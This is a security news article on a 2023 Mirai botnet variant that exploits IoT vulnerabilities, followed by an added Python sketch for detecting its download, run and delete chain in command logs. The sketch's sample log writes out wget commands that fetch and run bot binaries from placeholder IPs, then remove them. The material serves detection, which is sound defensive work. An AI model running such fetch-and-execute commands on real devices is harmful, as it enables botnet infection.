New Mirai botnet variant targets IoT vulnerabilities

July 15, 2023

A new cybercriminal campaign that started earlier this year propagates a new Mirai botnet variant by exploiting multiple IoT vulnerabilities. According to researchers, the campaign operators leverage the vulnerabilities to obtain control over the targeted devices to execute further cybercriminal operations, like Distributed Denial-of-Service (DDoS) attacks.

Based on reports, researchers identified two new Mirai botnet variants in an ongoing operation that started last March and surged in April and this month. These botnet variants target about 22 known security issues in several connected products, such as DVRs, WiFi communication dongles, NVRs, thermal monitoring systems, routers, solar power generation monitors, and access control systems.

Some of the products confirmed to be affected by these botnets come from well-known providers, such as TP-Link, Zyxel, D-Link, Arris, Nagios, SolarView, Tenda, MediaTek, and Nortek.

The Mirai botnet variants can start their infection process by exploiting a flaw that clears the path for running a shell script.

The attack chain of these Mirai botnet variants begins by abusing one of the known IoT vulnerabilities. The flaw could lay the groundwork for the botnet to execute a shell script from an external resource.

Subsequently, the script downloads the botnet client that corresponds to the architecture of the infected machine, such as arm6l, arm7l, mips, i686, i586, arm5l, mipsel, sh4, x86_64, arc, m68k, armv4l, and sparc.

After the bot client executes, the shell script downloader also deletes the client file to cover the infection's tracks and reduce the chances of detection.
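The fetch, execute, delete sequence described above leaves a recognisable trail in command-execution logs. The following detection sketch is an added example, not code from the researchers or the original article; the log format, session ids, file names and documentation-range IP addresses are constructed for illustration.

```python
import os
import shlex
from collections import defaultdict

# Architecture tags the article lists for the downloaded bot clients.
ARCHES = {"arm6l", "arm7l", "mips", "i686", "i586", "arm5l", "mipsel",
          "sh4", "x86_64", "arc", "m68k", "armv4l", "sparc"}
FETCHERS = {"wget", "curl", "tftp"}

# Constructed sample, format assumed: "<epoch> <session id> <command line>".
SAMPLE_LOG = """\
1689400000 412 wget http://198.51.100.7/client.mips -O /tmp/client.mips
1689400001 412 chmod 777 /tmp/client.mips
1689400002 412 /tmp/client.mips
1689400003 412 rm -rf /tmp/client.mips
1689400004 412 wget http://198.51.100.7/client.arm7l
1689400005 412 chmod 777 client.arm7l
1689400006 412 ./client.arm7l
1689400007 412 rm -rf client.arm7l
1689400100 977 wget http://203.0.113.5/firmware.bin -O /tmp/firmware.bin
1689400101 977 rm /tmp/firmware.bin
"""

def arch_of(name):
    """Return the architecture tag a file name ends with, or None."""
    tag = name.rsplit(".", 1)[-1]
    return tag if tag in ARCHES else None

def detect(log_text):
    """Map session id -> arch tags of files that were fetched, run, then deleted."""
    stage = defaultdict(dict)   # session -> {file basename: last stage seen}
    hits = defaultdict(set)
    for line in filter(str.strip, log_text.splitlines()):
        _ts, session, cmdline = line.split(" ", 2)
        argv = shlex.split(cmdline)
        prog, files = os.path.basename(argv[0]), stage[session]
        if prog in FETCHERS:
            # Output name: explicit -O/-o target, else last segment of the URL.
            out = next((argv[i + 1] for i, a in enumerate(argv[:-1])
                        if a in ("-O", "-o")), argv[-1])
            files[os.path.basename(out)] = "fetched"
        elif files.get(prog) == "fetched":
            files[prog] = "executed"
        elif prog == "rm":
            for name in map(os.path.basename, argv[1:]):
                if files.get(name) == "executed" and arch_of(name):
                    hits[session].add(arch_of(name))
    return {s: sorted(tags) for s, tags in hits.items()}

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```

A session that completes the chain for more than one architecture tag, as session 412 does here, is a stronger signal than a single hit, because legitimate firmware updates rarely fetch and run binaries for several CPU families on one device.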

Numerous Mirai botnet versions have appeared in the wild over the past several months. Earlier this year, a researcher noticed active exploitation of a command injection flaw in Zyxel gear by a botnet inspired by Mirai.

In February, a Mirai botnet called V3G4 exploited about 13 flaws in three different attacks to launch widespread DDoS campaigns.

Exploitation of IoT devices has remained prevalent over the past months as new botnet variants continue to emerge. Therefore, organisations should take precautionary measures and apply the latest security patches to protect their devices from attacks by Mirai-inspired botnet malware variants.
